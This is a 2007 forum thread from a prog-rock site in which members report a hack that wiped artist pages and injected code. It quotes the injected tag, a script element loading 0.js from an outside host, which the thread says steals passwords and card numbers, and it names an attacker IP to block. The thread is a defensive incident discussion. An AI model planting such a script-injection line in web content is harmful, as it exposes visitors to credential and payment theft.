Anathema: Left overs from the recent hack
Printed From: Progarchives.com
Category: Site News, Newbies, Help and Improvements
Forum Name: Report errors & omissions here
Forum Description: Seen a mistake in a band bio etc then please tell us
URL: http://www.progarchives.com/forum/forum_posts.asp?TID=44850
Printed Date: November 22 2024 at 05:42
Software Version: Web Wiz Forums 11.01 - http://www.webwizforums.com
Topic: Anathema: Left overs from the recent hack
Posted By: Angelo
Subject: Anathema: Left overs from the recent hack
Date Posted: December 28 2007 at 08:11
|
I found this in Report Bugs here: http://www.progarchives.com/forum/forum_posts.asp?TID=44668 - http://www.progarchives.com/forum/forum_posts.asp?TID=44668 Probably also other bio's are affected... ------------- http://www.iskcrocks.com" rel="nofollow - ISKC Rock Radio I stopped blogging and reviewing - so won't be handling requests. Promo's for ariplay can be sent to [email protected] |
Replies:
Posted By: Angelo
Date Posted: December 28 2007 at 10:35
|
Van Der Graaff Generator bio is also damaged and the picture gone....
------------- http://www.iskcrocks.com" rel="nofollow - ISKC Rock Radio I stopped blogging and reviewing - so won't be handling requests. Promo's for ariplay can be sent to [email protected] |
Posted By: Atkingani
Date Posted: December 28 2007 at 10:50
|
I'm afraid the problem could be worse...
Check the ULVER page:
http://www.progarchives.com/artist.asp?id=2089 - http://www.progarchives.com/artist.asp?id=2089 ------------- Guigo ~~~~~~ |
Posted By: Tuzvihar
Date Posted: December 28 2007 at 10:53
My post from the other thread:
I couldn't find it... ------------- "Music is much like f**king, but some composers can't climax and others climax too often, leaving themselves and the listener jaded and spent." Charles Bukowski |
Tuzvihar wrote:Posted By: Atkingani
Date Posted: December 28 2007 at 10:54
|
I checked randomly BACAMARTE page and there's a problem there too... and I cannot access properly the entire database right now.
Are we under attack? ------------- Guigo ~~~~~~ |
Posted By: Easy Livin
Date Posted: December 28 2007 at 10:58
| I think this must be a new bug. I've contacted mailto:M@x - M@x about it but it looks more prosaic. |
Posted By: chamberry
Date Posted: December 28 2007 at 11:34
|
Just found out that John Zorn's band page looks weird too: http://www.progarchives.com/artist.asp?id=2212 - http://www.progarchives.com/artist.asp?id=2212 ------------- 
|
Posted By: Tuzvihar
Date Posted: December 28 2007 at 11:36
|
I randomly checked also Le Orme, Porcupine tree, Vangelis... It looks like it affected every artist page.
------------- "Music is much like f**king, but some composers can't climax and others climax too often, leaving themselves and the listener jaded and spent." Charles Bukowski |
Posted By: chamberry
Date Posted: December 28 2007 at 11:39
Also, the streamable MP3s are missing.  -------------
|
Posted By: Dean
Date Posted: December 28 2007 at 12:12
|
Yep, this is a new attack - even the main forum page is taking minutes to load.
If there is anything you want me to do just ask, (not that the prospect of rebuilding the bio pages is cheering me up any  ).------------- What? |
Posted By: Tuzvihar
Date Posted: December 28 2007 at 12:32
I went to the Admin Zone and took the option Update artists (it loads very slow!) - it seems all data is gone!!! All I could find there is: <script src=http://c.uc8010.com/0.js></script>.   
------------- "Music is much like f**king, but some composers can't climax and others climax too often, leaving themselves and the listener jaded and spent." Charles Bukowski |
Posted By: Angelo
Date Posted: December 28 2007 at 12:40
|
Is M@X aware? Could be useful to temporarily disconnect the server from the web (either physically or through software) to avoid more damage... ------------- http://www.iskcrocks.com" rel="nofollow - ISKC Rock Radio I stopped blogging and reviewing - so won't be handling requests. Promo's for ariplay can be sent to [email protected] |
Posted By: Dim
Date Posted: December 28 2007 at 12:47
|
Damn, is there anything we can do? ------------- 
|
Posted By: Angelo
Date Posted: December 28 2007 at 12:55
|
^Not a lot I expect.... I sent the contents of the script to Bob, so he can pass it on to M@X.
------------- http://www.iskcrocks.com" rel="nofollow - ISKC Rock Radio I stopped blogging and reviewing - so won't be handling requests. Promo's for ariplay can be sent to [email protected] |
Posted By: Dean
Date Posted: December 28 2007 at 12:56
Run and hide. 
This one is nasty. It originates from China and is designed to attach itself to your browser for stealing passwords and credit card numbers.
------------- What? |
Posted By: Angelo
Date Posted: December 28 2007 at 13:16
|
Where did you find that. Dean? Thank god we have NoScript, and that on most pages it is inserted in the wrong place (it's being displayed as text rather than executed...) ------------- http://www.iskcrocks.com" rel="nofollow - ISKC Rock Radio I stopped blogging and reviewing - so won't be handling requests. Promo's for ariplay can be sent to [email protected] |
Posted By: Dean
Date Posted: December 28 2007 at 13:40
|
My initial thoughs are confirmed - the Forum main page is also affected.
The 0.js script from c.uc8010.com is the same script that hit many websites back in November: http://www.websense.com/securitylabs/blog/blog.php?BlogID=160 - http://www.websense.com/securitylabs/blog/blog.php?BlogID=160
If you see the c.uc8010.com/0.js script address on the page then it has not executed - the scary bit is when you don't see it, because it probably has executed, however apparently anti-virus software is catching it.
If you know how, then set your IP blocker to block address 61.188.39.218
If you are unprotected, then keep away from the PA until the problem is fixed. ------------- What? |
Posted By: Magic Mountain
Date Posted: December 28 2007 at 14:49
| I have gone to the forum main page and did not see "the c.uc8010.com/0.js script address on the page" referred to above and my virus software did not catch it. The main page did not load and had the message "Error on he Page" in the lower left-hand corner of the browser. Does this mean the script has executed and all of my passwords and credit card information has been transmitted? What is my next step? |
Posted By: Angelo
Date Posted: December 28 2007 at 15:24
|
^ I'll Send you a PM The problem seems to have been resolved, in that the script references are removed and all artist content restored. M@X seems to have taken care of things. In general: if this script does what it says on the pages Dean referred to, you should be fine if you run an up-to-date virus scanner on your computer. The script apparently tries to install software from the web that captures data like credit card number and passwords the moment they are typed in. Any good virus protection tool should catch those. People who don't have one installed I would advise to install and run one ( http://WWW.AVAST.COM - Avast is a good free solution that has protected me for 5 years now) before submitting online credit card orders or accessing online banking services. Hope no big damage is done to anyone! ------------- http://www.iskcrocks.com" rel="nofollow - ISKC Rock Radio I stopped blogging and reviewing - so won't be handling requests. Promo's for ariplay can be sent to [email protected] |
Posted By: Atkingani
Date Posted: December 28 2007 at 15:41
|
The main database is still off... maybe mailto:M@x - M@x is recovering it. ------------- Guigo ~~~~~~ |